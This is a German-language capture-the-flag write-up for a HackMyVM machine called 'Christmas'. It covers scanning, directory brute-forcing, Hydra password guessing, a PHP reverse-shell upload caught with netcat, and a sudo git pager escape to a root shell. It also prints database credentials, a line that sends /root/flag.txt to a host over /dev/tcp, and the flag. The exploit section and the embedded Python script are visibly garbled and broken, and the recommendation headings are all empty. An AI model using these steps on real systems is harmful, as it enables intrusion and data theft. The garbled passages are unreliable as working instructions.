Technische Analyse: vi /etc/hosts
öffnet die /etc/hosts-Datei mit dem vi-Texteditor. Diese Datei wird verwendet, um Hostnamen zu IP-Adressen zuzuordnen.
Kontextbezogene Bewertung: Durch Hinzufügen des Hostnamens "xmas.hmv" zur /etc/hosts-Datei kann der Hostname im Browser oder in anderen Tools verwendet werden, um auf den Zielserver zuzugreifen.
Handlungsorientierte Empfehlungen:
Technische Analyse: nikto -h http://christmas.hmv
ist ein Open-Source-Webserver-Scanner, der auf bekannte Schwachstellen, Konfigurationsfehler und gefährliche Dateien prüft. Die Option -h gibt das Ziel an.
Kontextbezogene Bewertung: Nikto hat mehrere interessante Punkte gefunden, darunter fehlende Sicherheitsheader (X-Frame-Options, X-Content-Type-Options), Directory Indexing in /css/, /php/ und /images/, sowie die Verwendung von ungültigen HTTP-Methoden. Diese Punkte können von Angreifern ausgenutzt werden.
Handlungsorientierte Empfehlungen:
Technische Analyse: dirb http://christmas.hmv
ist ein Tool zum Auffinden von versteckten Verzeichnissen und Dateien auf einem Webserver. Es verwendet eine Wordlist, um mögliche Pfade zu erraten und prüft, ob diese existieren.
Kontextbezogene Bewertung: Dirb hat mehrere interessante Verzeichnisse und Dateien gefunden, darunter /images/, /css/, /fonts/, /javascript/, /js/, /php/ und /uploads/. Diese könnten potenzielle Angriffsziele sein.
Handlungsorientierte Empfehlungen:
Technische Analyse: gobuster dir -u http://christmas.hmv -x txt,php,rar,zip,tar,pub,xls,docx,doc,sql,db,mdb,asp,aspx,accdb,bat,ps1,exe,sh,py,pl,gz,jpeg,jpg,png,html,phtml,xml,csv,dll,pdf,raw,rtf,xlsx,zip,kdbx,bak,js -w "/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt" -b '403,404' -e --no-error -k
ist ein Tool zum Auffinden von versteckten Verzeichnissen und Dateien auf einem Webserver. Es verwendet eine Wordlist, um mögliche Pfade zu erraten und prüft, ob diese existieren.
Kontextbezogene Bewertung: Gobuster hat ähnliche Verzeichnisse wie Dirb gefunden.
Handlungsorientierte Empfehlungen:
Technische Analyse: Hydra wird auf die User ausgefahren .
Kontextbezogene Bewertung: Hier werden die drei Benutzernamen die in der Webseite genannt worden sind mit der RockYou txt durchprobiert
Handlungsorientierte Empfehlungen:
Technische Analyse:Es wird versucht durch Subdomains weitere Informationen zu bekommen
Kontextbezogene Bewertung:www wird Gefunden
Handlungsorientierte Empfehlungen:
Technische Analyse: Hier werden mit http GET mehr Details rausgefunden
Kontextbezogene Bewertung: Informationen aus dem Browser sind sichtbar.
Handlungsorientierte Empfehlungen:
Technische Analyse: Hier wurde die Shell.php hochgeladen und im Terminal mit NetCat Verbindung Abgefangen
Kontextbezogene Bewertung: Webserver Zugriff aus der Kali erhalten. .
Handlungsorientierte Empfehlungen:
Technische Analyse: Hier Werden mit CMD befehlen nach root Rechten gesucht
Kontextbezogene Bewertung: Mit find / -type f -perm -4000 -ls 2>/dev/null weitere root Rechte gefunden.
Handlungsorientierte Empfehlungen:
user="root", password="ChristmasMustGon!", database="christmas" ) #Read the names of the wish list def read_names(directory): for filename in os.listdir(directory): full_path = os.path.join(directory, filename) if os.path.isfile(full_path): name, ext = os.path.splitext(filename) if any(char.isalnum() for char in name): status = random.choice(["nice", "naughty"]) #print(f"{name} {status}") insert_data(name, status) os.remove(full_path) else: pass elif os.path.isdir(full_path): pass # Insert name into the database def insert_data(name, status): mycursor = mydb.cursor() sql = "INSERT INTO christmas (name, status) VALUES ( %s, %s)" val = (name, status) mycursor.execute(sql, val) mydb.commit() #Generate printable Nice and Naughty list def generate_lists(): mycursor = mydb.cursor() # SQL query to fetch all names and status mycursor.execute("SELECT name, status FRM christmas") # Separate the nice and naughty lists nice_list = [] naughty_list = [] for (name, status) in mycursor: if status "nice": nice_list.append(name) else: naughty_list.append(name) parent_directory = os.path.dirname(os.getcwd()) file_path = "/home/alabaster/nice_list.txt" # Save the nice and naughty lists to separate txt files with open(file_path, "w") as file: for name in nice_list: file.write(f"{name}\n") file_path = "/home/alabaster/naughty_list.txt" with open(file_path, "w") as file: for name in naughty_list: file.write(f"{name}\n") read_names(directory) generate_lists() cat <hier wird endlich das Root passwort erhaltenconfig !/bin/sh EOF ./config chmod +x config sudo /usr/bin/git -p help config -c 'pager=./config' -c 'core.pager=!/bin/sh' show cat /root/flag.txt < /dev/tcp/192.168.2.122/21 id exit : exit < < >config -l !< >a/new-service :33 id : "
Technische Analyse: Der Exploit wurde erfolgreich ausgeführt
Holen der Flags HMV{Y4NV!7Ch3N1N_Y0u_4r3_7h3_R007_8672}
Technische Analyse:
arp-scan -l
sendet ARP-Anfragen an alle IP-Adressen im lokalen Netzwerksegment, um die MAC-Adressen der verbundenen Geräte zu ermitteln.Kontextbezogene Bewertung: Dieses Tool ist nützlich, um aktive Hosts im Netzwerk zu identifizieren, insbesondere wenn keine anderen Discovery-Methoden verfügbar sind.
Handlungsorientierte Empfehlungen: